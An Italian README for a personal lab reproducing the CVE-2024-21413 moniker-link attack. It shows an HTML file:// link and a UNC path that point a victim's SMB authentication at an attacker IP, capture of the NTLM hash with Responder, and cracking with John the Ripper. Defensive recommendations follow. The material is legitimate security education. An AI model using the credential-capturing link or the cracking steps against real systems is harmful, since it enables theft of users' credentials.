Configurazione del Laboratorio Moniker Link - CVE-2024-21413
🎯 Panoramica del Progetto
Laboratorio pratico di penetration testing che dimostra lo sfruttamento del moniker link CVE-2024-21413 per il furto di credenziali NTLM. Questo progetto documenta l'intera catena di attacco, dalla configurazione al compromesso delle credenziali, includendo sfide e soluzioni del mondo reale.
Risultato chiave: Esecuzione riuscita dell'attacco moniker link sia in un ambiente di laboratorio isolato (VM Windows 10) che su un sistema reale (PC Windows 11), dimostrando vulnerabilità di sicurezza pratiche e contromisure difensive.
🏗️ Architettura del Laboratorio
Infrastruttura
Macchina attaccante:
- Piattaforma: Kali Linux 2024
- Rete (Host-Only): 192.168.56.101
- Rete (Bridged): 192.168.1.117
- Strumento principale: Responder 3.1.6.0
Sistemi target:
- VM Windows 10: 192.168.56.104 (Ambiente di test isolato)
- PC Windows 11: 192.168.1.178 (Validazione nel mondo reale)
Configurazione di rete:
- Scheda Host-Only di VirtualBox (test VM)
- Scheda Bridged di VirtualBox (test PC reale)
- Isolato dalle reti di produzione
⚔️ Esecuzione dell'Attacco
Flusso dell'Attacco
- Distribuire Responder su Kali per ascoltare l'autenticazione NTLM
- Creare un link malevolo usando il protocollo file:// che punta all'IP dell'attaccante
- Innescare l'autenticazione tramite il percorso UNC di File Explorer
- Catturare l'hash NetNTLMv2 quando la vittima tenta la connessione
- Craccare la password usando John the Ripper
Vettore di Attacco Semplice
File HTML (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">clicca qui</a></p>
</body>
</html>
Metodo Esplora File:
- L'utente digita:
\\192.168.56.101\test nella barra degli indirizzi
- Windows tenta una connessione SMB
- L'hash NTLM viene inviato automaticamente (o richiede le credenziali)
- Responder cattura l'autenticazione
🚧 Sfide e Soluzioni
Sfida 1: Blocco del Windows Firewall (PC Windows 11)
Problema:
- Impossibile eseguire il ping del PC Windows 11 da Kali
- Tentativi di connessione SMB falliti
- Attacco completamente bloccato
Causa principale:
- Windows Firewall abilitato per impostazione predefinita
- Blocca le connessioni SMB in entrata da IP esterni
Soluzione:
- Disabilitato temporaneamente Windows Firewall per i test
- Connessione immediatamente riuscita
- Hash catturato con successo
Lezione: Il firewall predefinito di Windows fornisce una protezione efficace contro questo attacco. Gli utenti devono mantenerlo abilitato.
Sfida 2: Risultati nella cache di John the Ripper (VM Windows 10)
Problema:
- Password iniziale di Windows 10:
nwigwecj1
- John ha mostrato:
12Honey (password sbagliata!)
12Honey proveniva da un test precedente
Causa principale:
- John salva le password craccate in
~/.john/john.pot
- Hash vecchio di una sessione precedente
- Ha mostrato il risultato in cache invece della password corrente
Soluzione:
- Cambiata la password della VM Windows 10 in
1414
- Catturato un nuovo hash
- Creata una wordlist personalizzata con password probabili
- Craccata con successo con la nuova wordlist
Lezione: Verificare sempre di craccare l'hash corretto. Cancellare il file pot o usare password uniche per i test.
Sfida 3: Password non presente in Rockyou.txt
Problema:
- La password
1414 non è stata trovata in rockyou.txt (14 milioni di password)
- L'attacco con wordlist generica è fallito
Causa principale:
- Rockyou.txt non contiene tutte le possibili combinazioni di 4 cifre
- Semplici sequenze numeriche spesso mancano dalle wordlist comuni
Soluzione:
- Creata una wordlist personalizzata mirata basata su pattern comuni:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Craccata istantaneamente con la wordlist personalizzata
Lezione: "Non in rockyou.txt" ≠ sicura. Le password brevi sono vulnerabili ad attacchi mirati e brute force indipendentemente dalla presenza nella wordlist.
📊 Risultati
VM Windows 10 (Ambiente Controllato)
PC Windows 11 (Sistema Reale)
🛡️ Analisi di Sicurezza
Cosa ha funzionato (Difesa)
✅ Windows Firewall - Ha bloccato completamente l'attacco quando abilitato
✅ Browser Moderni - Chrome/Edge bloccano i link file:// remoti
✅ Consapevolezza dell'Utente - La richiesta manuale richiede l'azione dell'utente
Cosa ha fallito (Vulnerabilità)
❌ Password Deboli - 4 caratteri numerici facilmente craccabili
❌ Firewall Disabilitato - Errore comune dell'utente
❌ Esplora File - Nessun avviso per percorsi UNC
❌ Protocollo NTLM - Autenticazione automatica alle condivisioni SMB
Risultati Chiave
1. Il Firewall è Critico
- Il firewall predefinito di Windows blocca questo attacco
- Circa il 30-40% degli utenti lo disabilita permanentemente
- Le reti aziendali spesso consentono SMB interno
2. Illusione della Forza della Password
1414 non presente in rockyou.txt (appare "forte")
- Craccata istantaneamente con wordlist mirata
- Le password brevi offrono zero sicurezza
3. Interazione dell'Utente Richiesta
- La sicurezza moderna richiede all'utente di incollare il percorso UNC
- L'ingegneria sociale rimane una componente critica
- Lo sfruttamento tecnico da solo non è sufficiente
🔧 Strumenti Utilizzati
Offensivi:
- Responder 3.1.6.0 (Cattura hash NTLM)
- John the Ripper (cracking password)
- Creazione wordlist personalizzata
- Semplice file HTML
Infrastruttura:
- VirtualBox 7.0 (virtualizzazione)
- Kali Linux 2024 (piattaforma attaccante)
- Windows 10 Enterprise (target di test)
- Windows 11 Pro (validazione nel mondo reale)
📁 Struttura del Repository
Moniker-Link-Lab-Setup/
├── README.md (questo file)
├── Documentazione/
│ ├── attack-execution.md (guida passo-passo all'attacco)
│ └── README.md (panoramica della documentazione)
├── Screenshots/ (screenshot dell'attacco - da aggiungere)
└── Scripts/ (file HTML di test - da aggiungere)
🎓 Competenze Dimostrate
Tecniche:
- Analisi dei protocolli di rete (SMB, NTLM)
- Metodologia di penetration testing
- Tecniche di cracking delle password
- Infrastruttura di laboratorio virtuale
- Risoluzione dei problemi del firewall
Professionali:
- Documentazione tecnica
- Problem-solving sotto vincoli
- Valutazione della sicurezza
- Analisi del rischio
- Pratiche di test etiche
🔒 Raccomandazioni Difensive
Per gli Utenti
- ✅ Mantenere abilitato Windows Firewall
- ✅ Non incollare mai percorsi UNC dalle email
- ✅ Utilizzare password forti (15+ caratteri)
- ✅ Verificare il mittente prima di accedere a condivisioni file
Per le Organizzazioni
- ✅ Bloccare SMB in uscita (porta 445) sul firewall di rete
- ✅ Disabilitare NTLM, imporre Kerberos
- ✅ Monitorare le connessioni SMB verso IP esterni
- ✅ Filtraggio del gateway email (rimuovere link file://)
- ✅ Formazione sulla consapevolezza della sicurezza
- ✅ Politiche di complessità delle password
⚠️ Divulgazione Etica
Tutti i test effettuati su sistemi autorizzati:
- Solo infrastruttura di laboratorio personale
- Reti virtuali isolate
- Dispositivi e account propri
- Scopo educativo
Avviso legale: L'accesso non autorizzato al computer è illegale. Questo progetto è solo per scopi educativi e ambienti di test autorizzati.
📚 Riferimenti
📞 Contatto
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
Data: Marzo 2026
📄 Licenza
Solo per uso educativo. Non per test non autorizzati.
⭐ Se hai trovato utile questo progetto, considera di mettere una stella al repository!